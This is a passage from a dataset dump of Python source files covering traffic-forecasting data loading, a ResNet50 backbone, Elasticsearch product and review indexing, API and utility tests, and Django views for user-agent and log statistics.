os.path.exists(self.paths[0]):\n self.preprocessing(down_sample=self.down_sample, seq_len=self.seq_len, horizon=self.horizon)\n dat_1 = np.load(self.paths[0])\n for key in dat_1.keys():\n self.data[key] = dat_1[key]\n if key == 'input_raw_data' and self.data[key].max() > 1.0:\n self.data[key] = self.data[key].astype(np.float) / 255.0\n if self.num_paths == 2:\n dat_2 = np.load(self.paths[1])\n # what is clips?:\n # indices for input and output:\n num_clips_1 = dat_1['clips'].shape[1]\n dat_2['clips'][:,:,0] += num_clips_1\n # do concat\n self.data['clips'] = np.concatenate(\n (dat_1['clips'], dat_2['clips']), axis=1)\n self.data['input_raw_data'] = np.concatenate(\n (dat_1['input_raw_data'], dat_2['input_raw_data']), axis=0)\n self.data['output_raw_data'] = np.concatenate(\n (dat_1['output_raw_data'], dat_2['output_raw_data']), axis=0)\n for key in self.data.keys():\n print(key)\n print(self.data[key].shape)\n\n def total(self):\n return self.data['clips'].shape[1]\n\n def begin(self, do_shuffle = True):\n self.indices = np.arange(self.total(),dtype=\"int32\")\n if do_shuffle:\n random.shuffle(self.indices)\n self.current_position = 0\n if self.current_position + self.minibatch_size <= self.total():\n self.current_batch_size = self.minibatch_size\n else:\n self.current_batch_size = self.total() - self.current_position\n self.current_batch_indices = self.indices[\n self.current_position:self.current_position + self.current_batch_size]\n self.current_input_length = max(self.data['clips'][0, ind, 1] for ind\n in self.current_batch_indices)\n self.current_output_length = max(self.data['clips'][1, ind, 1] for ind\n in self.current_batch_indices)\n\n def next(self):\n self.current_position += self.current_batch_size\n if self.no_batch_left():\n return None\n if self.current_position + self.minibatch_size <= self.total():\n self.current_batch_size = self.minibatch_size\n else:\n self.current_batch_size = self.total() - self.current_position\n self.current_batch_indices = self.indices[\n self.current_position:self.current_position + self.current_batch_size]\n self.current_input_length = max(self.data['clips'][0, ind, 1] for ind\n in self.current_batch_indices)\n self.current_output_length = max(self.data['clips'][1, ind, 1] for ind\n in self.current_batch_indices)\n\n def no_batch_left(self):\n if self.current_position >= self.total() - self.current_batch_size:\n return True\n else:\n return False\n\n def input_batch(self):\n if self.no_batch_left():\n return None\n input_batch = np.zeros(\n (self.current_batch_size, self.current_input_length) +\n tuple(self.data['dims'][0])).astype(self.input_data_type)\n input_batch = np.transpose(input_batch,(0,1,3,4,2))\n for i in range(self.current_batch_size):\n batch_ind = self.current_batch_indices[i]\n begin = self.data['clips'][0, batch_ind, 0]\n end = self.data['clips'][0, batch_ind, 0] + \\\n self.data['clips'][0, batch_ind, 1]\n data_slice = self.data['input_raw_data'][begin:end, :, :, :]\n data_slice = np.transpose(data_slice, (0,2,3,1))\n input_batch[i, :self.current_input_length, :, :, :] = data_slice\n input_batch = input_batch.astype(self.input_data_type)\n\n return input_batch\n\n def output_batch(self):\n if self.no_batch_left():\n return None\n if(2 ,3) == self.data['dims'].shape:\n raw_dat = self.data['output_raw_data']\n else:\n raw_dat = self.data['input_raw_data']\n if self.is_output_sequence:\n if (1, 3) == self.data['dims'].shape:\n output_dim = self.data['dims'][0]\n else:\n output_dim = self.data['dims'][1]\n output_batch = np.zeros(\n (self.current_batch_size,self.current_output_length) +\n tuple(output_dim))\n else:\n output_batch = np.zeros((self.current_batch_size, ) +\n tuple(self.data['dims'][1]))\n for i in range(self.current_batch_size):\n batch_ind = self.current_batch_indices[i]\n begin = self.data['clips'][1, batch_ind, 0]\n end = self.data['clips'][1, batch_ind, 0] + \\\n self.data['clips'][1, batch_ind, 1]\n if self.is_output_sequence:\n data_slice = raw_dat[begin:end, :, :, :]\n output_batch[i, : data_slice.shape[0], :, :, :] = data_slice\n else:\n data_slice = raw_dat[begin, :, :, :]\n output_batch[i,:, :, :] = data_slice\n output_batch = output_batch.astype(self.output_data_type)\n output_batch = np.transpose(output_batch, [0,1,3,4,2])\n return output_batch\n\n def get_batch(self):\n input_seq = self.input_batch()\n output_seq = self.output_batch()\n batch = np.concatenate((input_seq, output_seq), axis=1)\n return batch\n\n def preprocessing(self, down_sample=1, seq_len=12, horizon=3):\n\n current_dir = os.path.dirname(self.paths[0])\n raw_data_dir = os.path.join(current_dir, self.name)\n files = list_filenames(raw_data_dir)\n num_days = len(files)\n time_slots = 288\n input_raw_data = [[], [], []]\n for f in files:\n try:\n fr = h5py.File(raw_data_dir + '/' + f, 'r')\n data = fr.get('array').value\n fr.close()\n except:\n continue\n data = np.transpose(data, (0, 3, 1, 2))\n for j in range(data.shape[1]):\n for i in range(data.shape[0]):\n tmp_data = data[i, j, :, :]\n n_rows, n_cols = tmp_data.shape\n # down sample the image\n tmp_data = cv2.resize(tmp_data, (n_cols//down_sample, n_rows//down_sample))\n input_raw_data[j].append(tmp_data)\n\n input_raw_data_channel_1 = np.stack(input_raw_data[0], axis=0) # volume\n input_raw_data_channel_2 = np.stack(input_raw_data[1], axis=0) # speed\n input_raw_data_channel_3 = np.stack(input_raw_data[2], axis=0) # heading\n\n # expand dims on axis1\n input_raw_data_channel_1 = np.expand_dims(input_raw_data_channel_1, axis=1)\n input_raw_data_channel_2 = np.expand_dims(input_raw_data_channel_2, axis=1)\n input_raw_data_channel_3 = np.expand_dims(input_raw_data_channel_3, axis=1)\n\n resulted_cols = input_raw_data_channel_1.shape[-1]\n resulted_rows = input_raw_data_channel_1.shape[-2]\n dims = np.array([[1, resulted_rows, resulted_cols]], np.int)\n\n # construct clips\n num_batches_one_day = time_slots // (seq_len + horizon)\n input_starts = np.arange(0, time_slots, (seq_len + horizon), np.int)[:num_batches_one_day]\n output_starts = np.arange(seq_len, time_slots, (seq_len + horizon), np.int)\n day_index = np.repeat(np.arange(num_days), num_batches_one_day) * time_slots\n input_starts = np.tile(input_starts, num_days) + day_index\n output_starts = np.tile(output_starts, num_days) + day_index\n\n input_seq_lens = np.array([seq_len] * (num_days * num_batches_one_day), np.int)\n output_horizons = np.array([horizon] * (num_days * num_batches_one_day), np.int)\n input_clips = np.stack([input_starts, input_seq_lens], axis=1)\n output_clips = np.stack([output_starts, output_horizons], axis=1)\n clips = np.stack([input_clips, output_clips], axis=0)\n\n # save different files\n volume_path = current_dir + '/{}_volume_down_sample{}.npz'.format(self.mode, down_sample)\n speed_path = current_dir + '/{}_speed_down_sample{}.npz'.format(self.mode, down_sample)\n heading_path = current_dir + '/{}_heading_down_sample{}.npz'.format(self.mode, down_sample)\n np.savez(volume_path, dims=dims, clips=clips, input_raw_data=input_raw_data_channel_1)\n np.savez(speed_path, dims=dims, clips=clips, input_raw_data=input_raw_data_channel_2)\n np.savez(heading_path, dims=dims, clips=clips, input_raw_data=input_raw_data_channel_3)\n","sub_path":"data_provider/traffic4cast.py","file_name":"traffic4cast.py","file_ext":"py","file_size_in_byte":9874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221744354","text":"import torch.nn as nn\nimport torchvision\nimport torch\nfrom typing import NewType\n\nclass ResNet50(nn.Module):\n def __init__(self, pretrained: bool = True, num_features_out: int = 256):\n super().__init__()\n self.pretrained = pretrained\n self.num_features_out = num_features_out\n self.resent50 = torchvision.models.resnet50(pretrained=self.pretrained)\n\n def get_features(self):\n features = list(self.resent50.children())\n\n input = nn.Sequential(*features[:4])\n conv2 = features[4]\n conv3 = features[5]\n conv4 = features[6]\n conv5 = features[7]\n\n lateral_c2 = nn.Conv2d(in_channels=256, out_channels=self.num_features_out, kernel_size=1)\n lateral_c3 = nn.Conv2d(in_channels=512, out_channels=self.num_features_out, kernel_size=1)\n lateral_c4 = nn.Conv2d(in_channels=1024, out_channels=self.num_features_out, kernel_size=1)\n lateral_c5 = nn.Conv2d(in_channels=2048, out_channels=self.num_features_out, kernel_size=1)\n\n dealiasing_p2 = nn.Conv2d(in_channels=self.num_features_out, out_channels=self.num_features_out, kernel_size=3, padding=1)\n dealiasing_p3 = nn.Conv2d(in_channels=self.num_features_out, out_channels=self.num_features_out, kernel_size=3, padding=1)\n dealiasing_p4 = nn.Conv2d(in_channels=self.num_features_out, out_channels=self.num_features_out, kernel_size=3, padding=1)\n\n # Freeze backbone\n for parameters in [module.parameters() for module in [input, conv2]]:\n for parameter in parameters:\n parameter.requires_grad = False\n\n module = NewType('layers',nn.Module)\n conv_layers = (module(x) for x in (input, conv2, conv3, conv4, conv5))\n lateral_layers = (module(x) for x in (lateral_c2, lateral_c3, lateral_c4, lateral_c5))\n dealiasing_layers = (module(x) for x in (dealiasing_p2, dealiasing_p3, dealiasing_p4))\n\n return conv_layers, lateral_layers, dealiasing_layers, self.num_features_out\n\n def forward(self,x):\n return self.resent50(x)\n \n","sub_path":"models/backbones/resnet50.py","file_name":"resnet50.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644464263","text":"# -*- coding: utf-8 -*-\n# @Time : 09/07/2021 02:56\n# @Author : Rodolfo Londero\n# @Email : rodolfopl@gmail.com\n# @File : test_text.py\n# @Software : VSCode\n\nimport pytest\n\n\nclass TestText13Bus:\n\n @pytest.fixture(autouse=True)\n def _request(self, solve_snap_13bus):\n self.dss = solve_snap_13bus\n self.dss.solution_solve()\n\n # ===================================================================\n # String methods\n # ===================================================================\n def test_text(self):\n expected = \"2000\"\n actual = self.dss.text('? Line.650632.Length')\n assert expected == actual\n","sub_path":"tests/py_dss_interface/test_text.py","file_name":"test_text.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535343986","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport datetime\nimport logging\nimport sys\nimport os\nimport errno\nfrom threading import RLock\n\nfrom cachetools import cached, LRUCache\n\nfrom contexttimer import timer\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\nfrom elasticsearch.serializer import JSONSerializer\nfrom elasticsearch.exceptions import SerializationError\n\nimport text_unidecode\nimport ujson\n\nLOGGER = logging.getLogger('app')\n\ncache = LRUCache(maxsize=1000)\nlock = RLock()\n\n\n#################################\n#################################\n\nclass TechnicalSession():\n\t\"\"\"\n\tThis class is dedicated to hosting technical methods on Elasticsearch\n\twhich do not require any Business input (such as lang or industry)\n\t\"\"\"\n\n\tdef __init__(self, hosts=None):\n\n\t\tif not isinstance(hosts, (list, tuple)) or not hosts:\n\t\t\traise RuntimeError('incorrect host configuration')\n\n\t\tself.es = Elasticsearch(hosts=hosts)\n\n\n\tdef create_index(self, index, mapping):\n\t\t\"\"\"\n\t\tcreates an index, throwing IndexAlreadyExistsException if the index\n\t\talready exists\n\n\t\t:Example:\n\t\t>> self.create_index('test', mapping)\n\t\t\"\"\"\n\t\tself.es.indices.create(index=index, body=mapping)\n\n\n\tdef delete_index(self, index):\n\t\tself.es.indices.delete(index, ignore=[400, 404])\n\n\n\tdef health(self):\n\t\treturn self.es.cluster.health(wait_for_status='yellow', request_timeout=1)\n\n\n\nclass QuerySession():\n\n\tdef __init__(self, hosts=None, lang='', industry=''):\n\n\t\tif not isinstance(hosts, (list, tuple)) or not hosts:\n\t\t\traise RuntimeError('incorrect host configuration')\n\n\t\tself.index = f\"catalogs_{industry}_{lang}\"\n\t\tself.index_training = f\"trainings_{industry}_{lang}\"\n\n\t\tself.doc_type = 'document'\n\n\t\tself.es = Elasticsearch(hosts=hosts)\n\n\n\tdef _extract_business_object(self, o):\n\t\t\"\"\"\n\t\tRemove all the ES specifics like '_hits'... and focus on the Business Object\n\t\tenriched with the _id and _parent attributes\n\t\t\n\t\t>>> _extract_business_object(doc)\n\t\t>>> {\n\t\t\t'_id' \t\t: 'ABC123',\n\t\t\t'_parent' \t: 'PRODUCTA',\n\t\t\t'type' \t\t: 'review',\n\t\t\t'sentiment' : 'positive',\n\t\t\t'title'\t\t: 'very good',\n\t\t\t'body'\t\t: 'excellent product' \n\t\t}\n\n\t\t\"\"\"\n\n\t\tif not isinstance(o, dict):\n\t\t\traise ValueError('The object is not a dict')\n\t\tif '_id' not in o:\n\t\t\traise KeyError('The object does not contain an _id')\n\t\tif '_source' not in o:\n\t\t\traise KeyError('The object does not contain a _source')\n\t\tsource = o['_source']\n\t\tsource['_id'] = o['_id']\n\t\tif '_parent' in o:\n\t\t\tsource['_parent'] = o['_parent']\n\t\tLOGGER.debug('_extract_business_object {}'.format(source))\n\t\treturn source\n\n\n\n\tdef _exclude_keys(self, dictionnary, exclude_keys):\n\t\t\"\"\"\n\t\tutility function that excludes keys from a dict and returns a clean dict\n\t\t\"\"\"\n\t\tnewd = {}\n\t\tfor k, v in list(dictionnary.items()):\n\t\t\tif k not in exclude_keys:\n\t\t\t\tnewd[k] = v\n\t\treturn newd\n\n\n\n\t# @timer(logger=LOGGER)\n\tdef get(self, id):\n\t\t\"\"\"\n\t\tRetrieves a document, this is usesful to check the correct integration of data\n\t\t\n\t\t:Example:\n\n\t\t>>> get('ABC123')\n\t\t>>> {\n\t\t\t'_id' \t\t: 'ABC123',\n\t\t\t'_parent' \t: 'PRODUCTA',\n\t\t\t'type' \t\t: 'review',\n\t\t\t'sentiment' : 'positive',\n\t\t\t'title'\t\t: 'very good',\n\t\t\t'body'\t\t: 'excellent product' \n\t\t}\n\t\t\"\"\"\n\t\tif id is None:\n\t\t\traise ValueError('id cannot be null')\n\t\t\n\t\tresult = self.es.search(\n\t\t\t\t index=self.index,\n\t\t\t\t stored_fields=False,\n\t\t\t\t _source=True,\n\t\t\t\t doc_type=self.doc_type,\n\t\t\t\t body={\n\t\t\t\t\t\t\"query\": {\n\t\t\t\t\t\t\t\"bool\" : { \n\t\t\t \"must\" : [\n\t\t\t {\"term\" : {\"_id\" : id}}\n\t\t\t ]\n\t\t\t }\n\t\t\t\t\t\t},\n\t\t\t\t\t\t\"size\": 1\n\t\t\t \t}\n\t\t\t\t)\n\t\tif result['hits']['total'] > 0:\n\t\t\tLOGGER.debug('getById : {}'.format(result['hits']['hits'][0]))\n\t\t\treturn self._extract_business_object(result['hits']['hits'][0])\n\t\telse:\n\t\t\tLOGGER.warning('Document not found {}'.format(id))\n\t\t\treturn None\n\n\n\t@timer(logger=LOGGER)\n\tdef delete(self, id):\n\t\t\"\"\"Deletes a document from the index\n\t\t\"\"\"\n\t\tif id is None or id.strip() == '':\n\t\t\traise ValueError('id cannot be null')\n\t\t\n\t\tresult = self.es.delete(index=self.index, id=id, doc_type=self.doc_type, refresh=True)\n\t\t\n\t\tif result['_shards']['successful'] == 1:\n\t\t\treturn True\n\t\treturn False\n\n\n\t###############################################################\n\n\t# @timer(logger=LOGGER)\n\tdef upsert_products(self, values):\n\t\t\"\"\"\n\n\t\tUpserts a product and attached reviews\n\n\t\tfor search / facetting facility The reviews are stored with the \n\t\t- Product Brand \n\t\t- Product Price\n\t\t- website\n\t\t- category\n\n\t\tThe categories are stored but also concatenated into a new field 'category_name'\n\t\twhich is text safe (using asciifolding)\n\n\t\tA field 'universe' is stored, as the text safe 1st part of the categories array\n\t\tA field 'galaxy' is stored, as the text safe 2nd part of the categories array\t\n\n\t\t\n\t\t\"\"\"\n\n\t\t############################################################################\n\t\t# INNER METHODS\n\t\t############################################################################\n\n\t\tdef _safe_text(text):\n\t\t\t_intermediate = text_unidecode.unidecode(text).strip().lower()\n\t\t\tfull = re.sub('[^A-Za-z0-9_.-]+', '', _intermediate)\n\t\t\treturn full\n\n\t\tdef _build_category_name(doc):\n\t\t\t# replace special chars\n\t\t\t# and fold to ascii\n\t\t\tfinal = []\n\t\t\tfor cat in doc['categories']:\n\t\t\t\tfinal.append(_safe_text(cat))\n\t\t\treturn ' '.join(final)\n\n\t\tdef _extract_universe(doc):\n\t\t\tif len(doc['categories']) == 0:\n\t\t\t\treturn ''\n\t\t\treturn _safe_text(doc['categories'][0])\n\n\t\tdef _extract_galaxy(doc):\n\t\t\tif len(doc['categories']) < 2:\n\t\t\t\treturn ''\n\t\t\treturn _safe_text(doc['categories'][1])\n\n\t\tdef _upsert_reviews(reviews=None, product_id=None, refresh_index=True):\n\t\t\t\"\"\"Inner method, should only be called internally \n\t\t\t\"\"\"\n\t\t\tif not isinstance(reviews, (list, tuple)):\n\t\t\t\traise ValueError('Expecting a list of reviews') \n\t\t\t\n\t\t\tupdate = []\n\t\t\tfor item in reviews:\n\t\t\t\tif '_id' not in item:\n\t\t\t\t\t# this review is issued from a scraping, it should\n\t\t\t\t\t# always contain an _id\n\t\t\t\t\traise ValueError('The review must have an _id') \n\t\t\t\tif 'product_review_join' not in item:\n\t\t\t\t\t# maybe this is the first time it is indexed\n\t\t\t\t\t# in this case, the produc_id must be passed as param\n\t\t\t\t\tif product_id is None:\n\t\t\t\t\t\traise ValueError('The review has no parent product') \n\t\t\t\telse:\n\t\t\t\t\tproduct_id = item['product_review_join']['parent']\n\t\t\t\t\n\t\t\t\tif 'created' not in item:\n\t\t\t\t\titem.update(created=datetime.datetime.now())\n\n\t\t\t\tdoc = self._exclude_keys(item, ['_id'])\n\t\t\t\tdoc.update(type=\"review\")\n\t\t\t\tdoc.update(product_review_join={'name': 'review', 'parent': product_id})\n\n\t\t\t\tupdate.append({\n\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t'_id': item['_id'],\n\t\t\t\t\t'_op_type': 'index',\n\t\t\t\t\t'_source': doc\n\t\t\t\t})\n\n\t\t\tLOGGER.debug(f\"Indexing reviews {update}\") \n\n\t\t\tupd = bulk(self.es, update, index=self.index, routing=product_id)\n\t\t\t\n\t\t\tif refresh_index:\n\t\t\t\tself.es.indices.refresh(index=self.index)\n\t\t\t\n\t\t\treturn upd\n\n\t\t############################################################################\n\n\t\tif not isinstance(values, (list, tuple)):\n\t\t\traise ValueError('Expecting a list of products') \n\n\t\tupd = {}\n\t\tupdate = []\n\t\trevs = {}\n\t\treviews = None\n\t\trouting = None\n\n\t\tfor item in values:\n\t\t\tif not isinstance(item, dict):\n\t\t\t\traise ValueError('Expecting a dict of values')\n\t\t\tif '_id' not in item:\n\t\t\t\t# the item is already issued from ES\n\t\t\t\t# it should contain an '_id'\n\t\t\t\traise ValueError('Product has neither an _id, nor an id') \n\t\t\tif 'created' not in item:\n\t\t\t\titem.update(created=datetime.datetime.now())\n\t\t\tif 'reviews' in item:\n\t\t\t\treviews = item['reviews']\n\t\t\tif routing is None:\n\t\t\t\t# take the first product id as routing of the packet\n\t\t\t\trouting = item['_id']\n\t\t\t\n\t\t\tdoc = self._exclude_keys(item, ['_id', 'reviews'])\t\n\t\t\tdoc.update(type='product')\t\t\n\t\t\tdoc.update(product_review_join='product')\n\n\t\t\t# calculate the category path and store it\n\t\t\tdoc.update(category_name=_build_category_name(doc))\n\n\t\t\t# extract the universe and store it\n\t\t\tdoc.update(universe=_extract_universe(doc))\n\n\t\t\t# extract the galaxy and store it\n\t\t\tdoc.update(galaxy=_extract_galaxy(doc))\n\n\t\t\tupdate.append({\n\t\t\t\t\t'_type'\t\t: 'document',\n\t\t\t\t\t'_id'\t\t: item['_id'],\n\t\t\t\t\t'_op_type'\t: 'index',\n\t\t\t\t\t'_source'\t: doc \n\t\t\t\t})\n\n\t\t\tif reviews is not None:\n\t\t\t\t# enrich the reviews with product info\n\t\t\t\t# to make analytics on reviews\n\t\t\t\t# ex: count reviews for marketplace products\n\t\t\t\tfor r in reviews:\n\t\t\t\t\tr.update(website=doc.get('website'))\n\t\t\t\t\tr.update(category_name=doc.get('category_name'))\n\t\t\t\t\tr.update(universe=doc.get('universe'))\n\t\t\t\t\tr.update(galaxy=doc.get('galaxy'))\n\t\t\t\t\tr.update(price=doc.get('price', 0))\n\t\t\t\t\tr.update(brand=doc.get('brand', ''))\n\t\t\t\t\tr.update(is_marketplace=doc.get('is_marketplace', False))\n\t\t\t\t\tr.update(variants_count=doc.get('variants_count', 0))\n\t\t\t\t\tLOGGER.debug(f\"Enriched review attributes: {r}\")\n\n\t\t# routing is mandatory\n\t\t# to index products and reviews in the same shard for the parent/child relationship\n\t\tif routing is not None:\n\t\t\tLOGGER.debug('Indexing a batch of {} products'.format(len(update))) \n\t\t\tupd = bulk(self.es, update, index=self.index, routing=routing)\n\n\t\t\tif reviews is not None:\n\t\t\t\t# a global refresh will be done afterwards\n\t\t\t\trevs = _upsert_reviews(reviews, product_id=item['_id'], refresh_index=False)\n\t\t\telse:\n\t\t\t\tLOGGER.debug('No review to be indexed') \n\n\t\t\tself.es.indices.refresh(index=self.index)\n\t\telse:\n\t\t\tLOGGER.error('Unable to index reviews, possible routing issue') \n\n\t\treturn {\n\t\t\t'products': upd,\n\t\t\t'reviews': revs,\n\t\t}\n\n\n\t###############################################################\n\n\t\n\t# @timer(logger=LOGGER)\n\tdef upsert_trainings(self, values):\n\t\t\"\"\"\n\t\tUsed to create or update a new training \n\t\t\"\"\"\n\t\tif not isinstance(values, (list, tuple)):\n\t\t\traise ValueError('Expecting a list of trainings') \n\n\t\tinsert = []\n\t\tupdate = []\n\t\tfor item in values:\n\t\t\tif not isinstance(item, dict):\n\t\t\t\traise ValueError(f\"Expecting a dict of values, found {type(item)}\")\n\t\t\tif '_id' in item:\n\t\t\t\tLOGGER.debug(f\"updating the training {item['_id']}\")\n\t\t\t\tid = item['_id']\n\t\t\t\tdoc = self._exclude_keys(item, ['_id'])\n\n\t\t\t\tupdate.append({\n\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t'_id': id,\n\t\t\t\t\t\t'_op_type': 'index',\n\t\t\t\t\t\t'_source': doc \n\t\t\t\t\t})\n\t\t\telse:\n\t\t\t\t# try to see if a training does not already exist\n\t\t\t\tif 'review_id' in item and item['review_id'] != '':\n\t\t\t\t\ttraining = self.es.search(\n\t\t\t\t\t index=self.index_training,\n\t\t\t\t\t doc_type=self.doc_type,\n\t\t\t\t\t body={\n\t\t\t\t\t\t\t\"query\": {\n\t\t\t\t\t\t\t\t\"bool\" : { \n\t\t\t\t\t \"must\" : [\n\t\t\t\t\t {\"match\" : {\"review_id\" : item['review_id']}}\n\t\t\t\t\t ]\n\t\t\t\t\t }\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"size\": 1\n\t\t\t\t \t}\n\t\t\t\t\t)\n\t\t\t\t\tif training['hits']['total']:\n\t\t\t\t\t\t# this is an update\n\t\t\t\t\t\tid = training['hits']['hits'][0]['_id']\n\t\t\t\t\t\tLOGGER.debug(f\"upsert training retrieved {id}, will be updated not inserted\")\n\t\t\t\t\t\tupdate.append({\n\t\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t\t'_id': id,\n\t\t\t\t\t\t\t'_op_type': 'index',\n\t\t\t\t\t\t\t'_source': item \n\t\t\t\t\t\t})\n\t\t\t\t\telse:\n\t\t\t\t\t\t# this is an insert\n\t\t\t\t\t\t# trainings may be created manually\n\t\t\t\t\t\t# an _id is not mandatory\n\t\t\t\t\t\t# in this case a new item is created\n\t\t\t\t\t\tLOGGER.debug(f\"New training entry to be created for {item}\")\n\t\t\t\t\t\titem['created'] = datetime.datetime.now()\n\t\t\t\t\t\tinsert.append({\n\t\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t\t'_source': item \n\t\t\t\t\t\t})\n\n\t\t\t\telse:\n\t\t\t\t\t# this is an insert\n\t\t\t\t\t# trainings may be created manually\n\t\t\t\t\t# an _id is not mandatory\n\t\t\t\t\t# in this case a new item is created\n\t\t\t\t\tLOGGER.debug(f\"New training entry to be created for {item}\")\n\t\t\t\t\titem['created'] = datetime.datetime.now()\n\t\t\t\t\tinsert.append({\n\t\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t\t'_source': item \n\t\t\t\t\t\t})\n\n\t\tins = bulk(self.es, insert, index=self.index_training)\n\t\tupd = bulk(self.es, update, index=self.index_training)\n\n\t\tself.es.indices.refresh(index=self.index_training)\n\t\t\n\t\treturn {\n\t\t\t'insert': ins,\n\t\t\t'update': upd\n\t\t}\n\n","sub_path":"datafeed/services/elastic_writer.py","file_name":"elastic_writer.py","file_ext":"py","file_size_in_byte":11841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256785647","text":"# Copyright (c) 2015 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom storyboard.tests import base\n\n\nclass TestDBExceptions(base.FunctionalTest):\n def setUp(self):\n super(TestDBExceptions, self).setUp()\n self.default_headers['Authorization'] = 'Bearer valid_superuser_token'\n\n # test duplicate entry error\n # in this test we try to create two equal projects\n def test_duplicate_project_create(self):\n resource = '/projects'\n project = {\n 'name': 'test-project-duplicate',\n 'description': 'test_project_duplicate_description',\n }\n\n # create project with name 'test-project-duplicate'\n response = self.post_json(resource, project)\n body = response.json\n self.assertEqual(project['name'], body['name'])\n self.assertEqual(project['description'], body['description'])\n\n # repeat creating this project\n # because project with name 'test-project-duplicate' already exists, we\n # wait abort with code_status 400\n response = self.post_json(resource, project, expect_errors=True)\n self.assertEqual(400, response.status_code)\n\n # test duplicate entry error\n # in this test we try to create two equal users\n def test_duplicate_user_create(self):\n # send user first time\n resource = '/users'\n user = {\n 'full_name': 'Test duplicate',\n 'email': 'dupe@example.com'\n }\n\n response = self.post_json(resource, user)\n users_body = response.json\n self.assertEqual(user['full_name'], users_body['full_name'])\n self.assertEqual(user['email'], users_body['email'])\n\n # send user again\n response = self.post_json(resource, user, expect_errors=True)\n self.assertEqual(400, response.status_code)\n","sub_path":"storyboard/tests/api/test_db_exceptions.py","file_name":"test_db_exceptions.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26314645","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nDescription: This file is used for some common util.\n\"\"\"\nimport io\nimport os\nimport shutil\nimport time\nfrom urllib.parse import urlencode\nimport numpy as np\nfrom PIL import Image\nfrom mindinsight.datavisual.common.enums import DataManagerStatus\n\n\ndef get_url(url, params):\n \"\"\"\n Concatenate the URL and params.\n\n Args:\n url (str): A link requested. For example, http://example.com.\n params (dict): A dict consists of params. For example, {'offset': 1, 'limit':'100}.\n\n Returns:\n str, like http://example.com?offset=1&limit=100\n\n \"\"\"\n\n return url + '?' + urlencode(params)\n\n\ndef delete_files_or_dirs(path_list):\n \"\"\"Delete files or dirs in path_list.\"\"\"\n for path in path_list:\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.remove(path)\n\n\ndef check_loading_done(data_manager, time_limit=15, first_sleep_time=0):\n \"\"\"If loading data for more than `time_limit` seconds, exit.\"\"\"\n if first_sleep_time > 0:\n time.sleep(first_sleep_time)\n start_time = time.time()\n while data_manager.status != DataManagerStatus.DONE.value:\n time_used = time.time() - start_time\n if time_used > time_limit:\n break\n time.sleep(0.1)\n continue\n\n\ndef get_image_tensor_from_bytes(image_string):\n \"\"\"Get image tensor from bytes.\"\"\"\n img = Image.open(io.BytesIO(image_string))\n image_tensor = np.array(img)\n\n return image_tensor\n","sub_path":"tests/utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379537333","text":"import re\nfrom datetime import datetime, timedelta\n\ntry:\n import cairo\n import pycha.pie\n GRAPH=True\nexcept:\n GRAPH=False\n\nfrom django.db.models import Sum, Q\nfrom django.shortcuts import render_to_response\n\nfrom misc.models import UserAgent, Log\nfrom misc.functions import gen_random_str, render_to_task, fs_space\nfrom utils.decorators import access_required\nfrom settings import PIE_PATH\n\n@access_required\ndef user_agents(request, mode):\n lines = []\n types = UserAgent.objects.all().values_list(\"codename\",flat=True).distinct()\n for type in types:\n lines.append([type, UserAgent.objects.filter(codename=type).aggregate(Sum('count'))[\"count__sum\"]])\n \n if GRAPH:\n link = user_agents_statistics(lines)\n return render_to_response(\"misc/user_agents.django.html\", {\"link\": link})\n else:\n max_count = 0\n for i in lines:\n max_count += i[1]\n \n lines = map(lambda x: (x[0], str(x[1]*100/max_count)+\"%\"), lines)\n return render_to_response(\"misc/user_agents_table.django.html\", {\"lines\": lines})\n\n@access_required\ndef system_logs(request, mode):\n user = request.user\n \n search = request.GET.get(\"value\", None)\n period = request.GET.get(\"period\", None)\n order_by = request.GET.get(\"order_by\", \"date\")\n \n logs = Log.objects.all()\n if period or search:\n template = \"misc/log_search.django.html\"\n # Check period format here\n \n if search:\n logs = logs.get(Q(type__icontains=search) | Q(type__icontains=msg))\n else:\n template = \"misc/system_log.django.html\"\n # Default values\n from_ = datetime.now()-timedelta(10)\n till = datetime.now()\n period = \"%s - %s\" % (from_.strftime(\"%d.%m.%y\"), till.strftime(\"%d.%m.%y\"))\n \n if period:\n date_range = []\n str_dates = re.split(\"\\s*-\\s*\", period)\n for str_date in str_dates:\n list_date = re.split(\"\\.\", str_date)\n list_date.reverse()\n year, month, day = map(lambda x: int(x), list_date)\n date_range.append(datetime(year,month,day))\n \n logs = logs.filter(date__range=date_range)\n \n return render_to_response(template, 